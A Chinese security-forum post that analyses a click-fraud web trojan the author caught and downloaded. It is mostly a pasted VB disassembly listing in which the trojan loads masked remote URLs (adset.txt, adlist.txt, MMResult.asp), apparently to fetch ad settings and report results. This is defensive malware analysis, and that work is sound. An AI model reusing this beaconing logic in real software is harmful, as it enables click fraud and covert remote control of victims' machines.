文章作者:混世魔王信息来源:邪恶八进制信息安全团队(www.eviloctal.com)系统补丁打完,网上瞎灌,居然还中网马,哎.现在....把他网马down下来,8错,真牛.通杀98.nt.2000.xp.xpsp2.2003.自己留着,随便来分析了下他的木马。一刷流量木马。服了。现在小马都出到这个份上了。脱壳略,VB编写。00403DAD . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresu>; msvbvm60.__vbaHresultCheckObj00403DB3 . 8985 E0FCFFFF MOV DWORD PTR SS:[EBP-320],EAX00403DB9 . EB 0A JMP SHORT Rundll32.00403DC500403DBB > C785 E0FCFFFF>MOV DWORD PTR SS:[EBP-320],000403DC5 > 8B95 60FEFFFF MOV EDX,DWORD PTR SS:[EBP-1A0]00403DCB . 8995 F8FCFFFF MOV DWORD PTR SS:[EBP-308],EDX00403DD1 . C785 60FEFFFF>MOV DWORD PTR SS:[EBP-1A0],000403DDB . 8B85 F8FCFFFF MOV EAX,DWORD PTR SS:[EBP-308]00403DE1 . 8985 34FEFFFF MOV DWORD PTR SS:[EBP-1CC],EAX00403DE7 . C785 2CFEFFFF>MOV DWORD PTR SS:[EBP-1D4],800403DF1 . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4]00403DF7 . 8D8D F8FEFFFF LEA ECX,DWORD PTR SS:[EBP-108]00403DFD . FF15 08104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarMo>; msvbvm60.__vbaVarMove00403E03 . C745 FC 06000>MOV DWORD PTR SS:[EBP-4],600403E0A . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adset.txt"00403E14 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],800403E1E . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]00403E24 . 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]00403E27 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy00403E2D . C745 FC 07000>MOV DWORD PTR SS:[EBP-4],700403E34 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adlist.txt"00403E3E . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],800403E48 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]00403E4E . 8D8D 6CFFFFFF LEA ECX,DWORD PTR SS:[EBP-94]00403E54 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy00403E5A . C745 FC 08000>MOV DWORD PTR SS:[EBP-4],800403E61 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/MMResult.asp"00403E6B . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],800403E75 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]00403E7B . 8D4D 8C LEA ECX,DWORD PTR SS:[EBP-74]00403E7E . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy